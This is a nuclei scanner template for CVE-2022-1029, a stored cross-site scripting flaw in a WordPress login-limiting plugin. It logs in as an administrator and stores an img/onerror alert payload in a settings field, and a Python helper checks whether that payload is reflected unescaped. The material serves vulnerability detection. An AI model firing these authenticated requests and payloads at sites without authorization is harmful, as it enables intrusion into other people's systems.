id: CVE-2022-1029

info:
  name: Limit Login Attempts - Stored Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    The Limit Login Attempts WordPress plugin (miniorange-limit-login-attempts) before 4.0.72 does not sanitise or escape some of its settings, so a user with administrator privileges can store JavaScript in them. The stored script runs even where the unfiltered_html capability is disallowed (for example in a multisite setup), which is what makes an administrator-only injection a vulnerability rather than expected behaviour.
  impact: |
    An attacker who already holds administrator privileges can execute arbitrary JavaScript in the context of the site for any user who views the affected settings page, potentially stealing cookies or hijacking user sessions.
  remediation: |
    Update to version 4.0.72 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1029
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2022-1029
    epss-score: 0.00185
    epss-percentile: 0.39977
    cwe-id: CWE-79
  metadata:
    verified: true
    max-requests: 2
    publicwww: "/wp-content/plugins/miniorange-limit-login-attempts/"
  tags: cve,cve2022,wordpress,wp,wp-plugin,miniorange-limit-login-attempts,xss,authenticated

# Authenticated, two-step check: request 1 logs in as the supplied (administrator)
# user and is only used for its session cookie; request 2 stores the payload.
flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  # Caveat: this request persists the payload in the plugin's referrer-blocking
  # setting on the target. Remove it from the Advanced Blocking page after testing.
  - raw:
      - |
        POST /wp-admin/admin.php?page=advancedblocking HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        option=mo_wpns_block_referrer&referrer_1=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "referrerblockingtable", "<img src=x onerror=alert(document.domain)>")'
        condition: and
# digest: 4a0a004730450221008216adcefedac8c2b40b1c90f7dbe792c81c1a28e83fcc38779ff81089df225902203f4b71323baad7c52197e84decc01825cf7dcf8d399a6339279cab8216966496:922c64590222798bb761d5b6d8e72950
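An added example, not part of the nuclei template above and not code from the plugin: a small Python script that builds the two form bodies the template sends (so the URL-encoded payload can be checked against the template's `referrer_1` value) and classifies how a settings page reflects the stored value. It distinguishes a verbatim reflection, which is the bug, from the entity-encoded form a fixed version produces. The sample response bodies are constructed here, and treating `html.escape(..., quote=True)` as equivalent to what WordPress `esc_attr()` emits for this particular payload is an assumption of this example.

```python
import html
from urllib.parse import urlencode

# Payload and page marker taken from the nuclei template.
PAYLOAD = '"><img src=x onerror=alert(document.domain)>'
MARKER = "referrerblockingtable"


def build_bodies(username: str, password: str) -> tuple[str, str]:
    """Return the two form bodies the template sends: the wp-login.php
    login and the settings POST that stores PAYLOAD in referrer_1.
    urlencode() applies the same encoding the template shows inline."""
    login = urlencode({"log": username, "pwd": password, "wp-submit": "Log In"})
    inject = urlencode({"option": "mo_wpns_block_referrer", "referrer_1": PAYLOAD})
    return login, inject


def classify_reflection(body: str, payload: str = PAYLOAD, marker: str = MARKER) -> str:
    """Classify how the settings page reflects the stored referrer value.

    'unescaped'         - payload appears verbatim: the stored XSS fires.
    'escaped'           - only the entity-encoded form appears, i.e. the
                          output is attribute-escaped (assumed to equal
                          html.escape(payload, quote=True) for this payload).
    'absent'            - the page marker is present but the value is not shown.
    'not-settings-page' - the referrer-blocking table marker is missing, e.g.
                          login failed or the plugin is not installed.
    """
    if marker not in body:
        return "not-settings-page"
    if payload in body:
        return "unescaped"
    if html.escape(payload, quote=True) in body:
        return "escaped"
    return "absent"


# Constructed sample responses (not captured from a real site). The vulnerable
# body echoes the setting straight into a value="" attribute, so the payload's
# leading "> closes the attribute and the <img> tag lands in the page.
VULNERABLE_BODY = (
    '<table id="referrerblockingtable"><tr><td>'
    '<input type="text" name="referrer_1" value="' + PAYLOAD + '">'
    "</td></tr></table>"
)
FIXED_BODY = (
    '<table id="referrerblockingtable"><tr><td>'
    '<input type="text" name="referrer_1" value="' + html.escape(PAYLOAD, quote=True) + '">'
    "</td></tr></table>"
)


if __name__ == "__main__":
    # Hypothetical credentials, only to show the encoded bodies.
    login, inject = build_bodies("admin", "password")
    print("login body :", login)
    print("inject body:", inject)
    for name, body in (("vulnerable", VULNERABLE_BODY), ("fixed", FIXED_BODY)):
        print(f"{name}: {classify_reflection(body)}")
```

The `inject` body reproduces the template's second request byte for byte, which is a quick way to confirm a hand-edited payload still encodes the way the matcher expects. `classify_reflection` is what you would run on the response of a follow-up GET to the settings page; a result of `escaped` on a site that is otherwise reachable is the signal that the 4.0.72 fix is in place.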